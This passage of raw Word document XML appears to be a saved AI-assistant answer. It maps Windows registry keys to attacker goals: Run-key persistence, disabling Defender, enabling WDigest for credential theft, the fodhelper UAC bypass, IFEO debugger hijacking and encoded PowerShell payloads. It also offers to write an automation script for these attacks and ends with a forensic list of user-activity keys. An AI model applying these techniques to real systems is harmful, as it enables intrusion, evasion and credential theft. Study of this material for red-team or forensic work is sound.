            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0685F80C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>IFEO misuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C89A399" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>Persistence via IFEO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00015685" w14:paraId="0F247358" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ACEB2BC" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t xml:space="preserve">UAC bypass via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00015685">
              <w:t>fodhelper</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56AB929D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>Known signature — alerts likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00015685" w14:paraId="20B1B8E4" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0469B670" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>Registry-stored payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66889464" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>Rare — harder to detect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D0EC045" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="62116B6C">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F2EECF" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">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5972"/>
        <w:gridCol w:w="1222"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00015685" w14:paraId="2600C5C6" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17C04994" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00015685">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46D36617" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00015685">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Registry Path/Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37006A74" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00015685">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00015685" w14:paraId="6996E3FD" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06B00A69" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A8C0A94" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>HKCU\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="597E9E97" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>reg add ...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00015685" w14:paraId="4BCE6241" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CB558A5" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>Defender evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="341695D2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>HKLM\SOFTWARE\Policies\Microsoft\Windows Defender</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="617E77FF" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>Disable via reg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00015685" w14:paraId="7F5DC378" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="479C31AD" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>Credential stealing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E2AA06D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>HKLM\SYSTEM\...\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00015685">
              <w:t>WDigest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00015685">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00015685">
              <w:t>Winlogon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5459429F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t xml:space="preserve">Enable </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00015685">
              <w:t>WDigest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00015685" w14:paraId="78BEE278" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B20E082" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>UAC bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4751B644" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>HKCU\Software\Classes\ms-settings\...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24CA1CC8" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00015685">
              <w:t>Fodhelper</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00015685">
              <w:t xml:space="preserve"> hack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00015685" w14:paraId="550C8960" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E03102D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>Redirection/IFEO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66906E7B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>HKLM\SOFTWARE\...\Image File Execution Options\binary.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DEB403F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>Debugger value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00015685" w14:paraId="485341E8" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CFF1592" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>Fileless payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40EB58E2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>HKCU:\Software\Microsoft\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00015685">
              <w:t>MyPayload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FBD9D96" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>PowerShell encoded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D1446E2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="5152FA94">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF031A1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t>Would you like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ACCC0D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:t>A PowerShell script to automate these registry-based attacks?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1CCB0B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:t>Or a custom lab setup with registry-based persistence and detection in an Azure VM?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA620F1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="394A7D04" w14:textId="77777777" w:rsidR="00A71933" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="79AAD685" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Registry Locations for User Activity and Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F4A4E1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Recent Activity &amp; MRU Lists (HKCU - Current User):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29660942" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7DE153" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>LastVisitedPidlMRU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> — Recently visited folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A39F768" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>OpenSavePidlMRU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> — Recently opened/saved files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD52AD7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs — Recent documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D9870C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>RunMRU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> — Run command history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1EA475" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:lastRenderedPageBreak/>
        <w:t>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths — Typed paths in Explorer address bar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E98192F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist — User activity metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0B0381" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Startup Items:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D924734" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC25979" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEF7104" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF7C2C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DB7608" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shellbags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Track folder view settings):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354BE6C6" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKCU\SOFTWARE\Microsoft\Windows\Shell\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>BagMRU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3BE119EA" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKCU\SOFTWARE\Microsoft\Windows\Shell\Bags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ABF3A2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>These store folder view history and can be used for timeline reconstruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AE6E95" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Classes Data (per-user COM settings):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED53712" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKCU\SOFTWARE\Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AEB1F1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Corresponds to the file %USERPROFILE%\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
